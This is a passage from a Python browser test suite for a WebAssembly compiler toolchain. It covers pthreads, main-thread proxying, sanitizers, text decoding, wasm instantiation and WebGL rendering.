self.btest_exit(test_file('pthread/test_pthread_spawns.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '--closure=1', '-sENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest_exit(test_file('pthread/test_pthread_volatile.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest_exit(test_file('pthread/test_pthread_thread_local_storage.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest_exit(test_file('pthread/test_pthread_condition_variable.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest_exit(test_file('pthread/test_pthread_printf.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sLIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest_exit(test_file('pthread/test_pthread_iostream.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(test_file('unistd/io.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sWASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@also_with_wasm2js
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest_exit(test_file('pthread/test_pthread_setspecific_mainthread.c'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS'])
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest_exit(test_file('pthread/test_pthread_file_io.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']]:
self.btest_exit(test_file('pthread/test_pthread_supported.cpp'), args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(test_file('pthread/test_pthread_dispatch_after_exit.c'), args=['-sUSE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@requires_threads
def test_pthread_custom_pthread_main_url(self):
self.set_setting('EXIT_RUNTIME')
ensure_dir('cdn')
create_file('main.cpp', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
_Atomic int result = 0;
void *thread_main(void *arg) {
result = 1;
pthread_exit(0);
}
int main() {
pthread_t t;
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
assert(result == 1);
return 0;
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-sWASM=0', '-sIN_TEST_HARNESS', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
shutil.move('test.worker.js', Path('cdn/test.worker.js'))
if os.path.exists('test.html.mem'):
shutil.copyfile('test.html.mem', Path('cdn/test.html.mem'))
self.run_browser('test.html', '', '/report_result?exit:0')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-sWASM=0', '-sIN_TEST_HARNESS', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-o', 'test2.html'], reporting=Reporting.JS_ONLY)
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?exit:0')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest_exit(test_file('pthread/test_pthread_proxying_in_futex_wait.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest_exit(test_file('pthread/test_pthread_sbrk.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-sINITIAL_MEMORY=128MB'])
# Test that -sABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-sUSE_PTHREADS']]:
self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-sABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread_flood.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest_exit(test_file('pthread/call_async.c'), args=['-sUSE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-sUSE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js'), '-sEXPORTED_FUNCTIONS=_main,_malloc'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-sUSE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]:
self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-sWASM_ASYNC_COMPILATION=0']
self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest_exit(test_file('pthread/test_pthread_clock_drift.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest_exit(test_file('pthread/test_pthread_utf8_funcs.cpp'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@also_with_wasm2js
@requires_threads
def test_pthread_wake_all(self):
self.btest_exit(test_file('pthread/test_futex_wake_all.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sINITIAL_MEMORY=64MB'])
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest_exit(test_file('pthread/test_pthread_stack_bounds.cpp'), args=['-sUSE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest_exit(test_file('pthread/test_pthread_tls.cpp'), args=['-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest_exit(test_file('pthread/test_pthread_tls_main.cpp'), args=['-sUSE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(test_file('core/test_safe_stack.c'), expected='abort:stack overflow', args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sSTACK_OVERFLOW_CHECK=2', '-sTOTAL_STACK=64KB'])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
@no_firefox('https://github.com/emscripten-core/emscripten/issues/15978')
def test_pthread_lsan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(test_file('pthread/test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_asan_use_after_free_2(self):
# similiar to test_pthread_asan_use_after_free, but using a pool instead
# of proxy-to-pthread, and also the allocation happens on the pthread
# (which tests that it can use the offset converter to get the stack
# trace there)
self.btest(test_file('pthread/test_pthread_asan_use_after_free_2.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=1', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free_2.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-sUSE_PTHREADS',
'-sPROXY_TO_PTHREAD',
'-sPTHREAD_POOL_SIZE=2',
'-sEXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', test_file('core/pthread/test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core/pthread/test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_trap(self):
create_file('pre.js', '''
if (typeof window === 'object' && window) {
window.addEventListener('error', function(e) {
if (e.error && e.error.message.includes('unreachable'))
maybeReportResultToServer("expected exception caught");
else
maybeReportResultToServer("unexpected: " + e);
});
}''')
args = ['-sUSE_PTHREADS',
'-sPROXY_TO_PTHREAD',
'-sEXIT_RUNTIME',
'--profiling-funcs',
'--pre-js=pre.js']
self.btest(test_file('pthread/test_pthread_trap.c'), expected='expected exception caught', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(test_file('core/test_main_thread_async_em_asm.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_file('page.html', read_file(test_file('browser/test_em_asm_blocking.html')))
self.compile_btest([test_file('browser/test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest_exit(test_file('test_sigalrm.c'), args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-sWASM=0']
print('plain html')
self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, returncode in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-sWASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-sWASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, returncode)
self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-sINITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', Path('cdn/test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
@also_with_threads
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-sEXPORTED_RUNTIME_METHODS=[UTF8ToString]'])
@also_with_threads
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-sEXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])
@also_with_threads
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-sTEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-sTEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
# pthread TextDecoder support is more complex due to
# https://github.com/whatwg/encoding/issues/172
# and therefore the expected code size win there is actually a loss
if '-pthread' not in self.emcc_args:
self.assertLess(td_without_fallback, just_fallback)
else:
self.assertGreater(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-sINCOMING_MODULE_JS_API=[]', '-sENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5500), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sOFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sOFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest_exit('gl_only_in_pthread.cpp', args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sOFFSCREENCANVAS_SUPPORT', '-lGL', '-sOFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-sFULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-sMAX_WEBGL_VERSION=2',
'-sOFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sample_query(self):
cmd = ['-sMAX_WEBGL_VERSION=2', '-lGL']
self.btest_exit('webgl_sample_query.cpp', args=cmd)
@requires_graphics_hardware
def test_webgl_timer_query(self):
for args in [
# EXT query entrypoints on WebGL 1.0
['-sMAX_WEBGL_VERSION'],
# builtin query entrypoints on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2'],
# EXT query entrypoints on a WebGL 1.0 context while built for WebGL 2.0
['-sMAX_WEBGL_VERSION=2'],
]:
cmd = args + ['-lGL']
self.btest_exit('webgl_timer_query.cpp', args=cmd)
# Tests that -sOFFSCREEN_FRAMEBUFFER rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
for version in [[], ['-sFULL_ES3'], ['-sFULL_ES3']]:
args = ['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest_exit('webgl_draw_triangle.c', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest_exit('test_webgl_no_auto_init_extensions.c', args=['-lGL', '-sGL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-sMAX_WEBGL_VERSION', '-sOFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-sMAX_WEBGL_VERSION'],
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-sOFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest_exit('webgl_offscreen_framebuffer_swap_with_bad_state.c', args=cmd)
# Tests that -sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest_exit('webgl_draw_triangle_with_uniform_color.c', args=['-lGL', '-sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-sMAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@parameterized({
'': ([False],),
'asyncify': ([True],),
})
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_proxied_pthread(self, asyncify):
cmd = ['-sUSE_PTHREADS', '-sOFFSCREENCANVAS_SUPPORT', '-lGL', '-sGL_DEBUG', '-sPROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-sASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest_exit('gl_in_proxy_pthread.cpp', args=cmd)
@parameterized({
'proxy': (['-sPROXY_TO_PTHREAD'],),
'': ([],),
})
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self, args):
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-sOFFSCREENCANVAS_SUPPORT', '-sOFFSCREEN_FRAMEBUFFER']]:
cmd = args + args2 + args3 + ['-sUSE_PTHREADS', '-lGL', '-sGL_DEBUG']
print(str(cmd))
self.btest_exit('resize_offscreencanvas_from_main_thread.cpp', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-sMAX_WEBGL_VERSION=2',
'-sGL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-sGL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest_exit('webgl2_simple_enable_extensions.c', args=cmd)
@requires_graphics_hardware
